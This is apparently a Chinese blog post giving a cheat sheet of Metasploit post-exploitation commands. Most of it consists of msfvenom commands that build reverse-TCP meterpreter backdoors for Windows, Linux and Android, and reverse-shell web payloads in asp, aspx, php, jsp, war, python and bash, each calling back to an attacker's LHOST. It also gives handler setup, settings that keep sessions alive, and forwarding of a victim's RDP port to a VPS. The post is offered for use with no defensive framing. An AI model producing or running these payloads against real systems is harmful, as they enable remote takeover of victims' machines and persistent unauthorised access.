msf后渗透常用命令-window、linux、安卓、webshell

查找所有模块:

msfvenom -l platforms

查找对应模块有meterpreter控制台的后门:

msfvenom -l payloads | grep windows | grep meterpreter

msfvenom -l payloads | grep windows | grep reverse_tcp

 

 

 

常用生成命令:

windows:

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=kali LPORT=5757  -f exe > /root/shell0518.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali LPORT=1234 -f exe -o /root/shell.exe

linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=kali LPORT=111 -f elf > /1.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=kali LPORT=111 -f elf > /1.elf

安卓:

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.9.136.152 LPORT=4444 R >android_yuanboss.apk

安卓监听端:

set payload android/meterpreter/reverse_tcp

脚本语言:

web类型载荷
asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > /1.asp
aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LLHOST=<IP> LPORT=<PORT> -f aspx > /1.aspx
php
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > /1.php
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > ~/Desktop/1.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

 使用:

use exploit/multi/handler
set PAYLOAD      <对应Payload>
set LHOST        <IP>
set LPORT        <Port>
exploit

msf权限维持使用命令:
set ExitOnSession false
//可以在接收到seesion后继续监听端口,保持侦听
set SessionCommunicationTimeout 0  //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
exploit -j -z

msf端口转发:
下面的命令是将目标机的3389转发到vps的12341端口
portfwd add -l 12341 -r 127.0.0.1 -p 3389

根据端口查找进程:
[root@lg ~]# netstat -nlp | grep 8830
tcp6       0      0 :::8830                 :::*                    LISTEN      1375/java  
其中1375为进程id

根据进程ID立刻杀死进程
kill -9 1375

posted @ 2022-05-28 11:56  逆向菜狗  阅读(498)  评论(0编辑  收藏  举报